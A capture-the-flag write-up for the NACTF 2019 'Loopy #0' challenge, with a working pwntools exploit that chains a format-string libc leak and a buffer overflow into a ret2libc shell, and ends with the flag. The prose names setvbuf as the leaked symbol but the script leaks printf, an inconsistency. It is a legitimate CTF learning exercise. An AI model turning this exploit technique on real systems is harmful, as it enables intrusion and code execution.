Loopy #0
Binary Exploitation - Points: 350
This program is quite short, but has got
printf
andgets
in it! This shouldn’t be too hard, right?Connect at
nc shell.2019.nactf.com 31283
The exploit uses a format string to print out the address of setvbuf
from libc
to be able to calculate the libc
base address. It also overflows the buffer to call the function recursively again to be able to send another input.
With the libc
base address we can now calculate the addresses of system
and /bin/sh
and overflow the buffer again to jump to it and spawn a shell.
Exploit script:
from pwn import *
libc = ELF('libc.so.6')
system = libc.symbols['system']
shell = next(libc.search('/bin/sh'))
libc_setvbuf = libc.symbols['printf']
e = ELF('loopy-0')
printf = e.got['printf']
# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')
payload = p32(printf) + '%4$s' + 'A' * 68 + p32(e.symbols['vuln'])
p.sendline(payload)
p.recvuntil('You typed: ')
p.recv(4)
leak = u32(p.recv(4))
log.info("leak: " + hex(leak))
libc_base = leak - libc_setvbuf
system = libc_base + system
shell = libc_base + shell
log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))
p.sendline('A'*76+p32(system)+p32(0x0)+p32(shell))
p.interactive()
flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}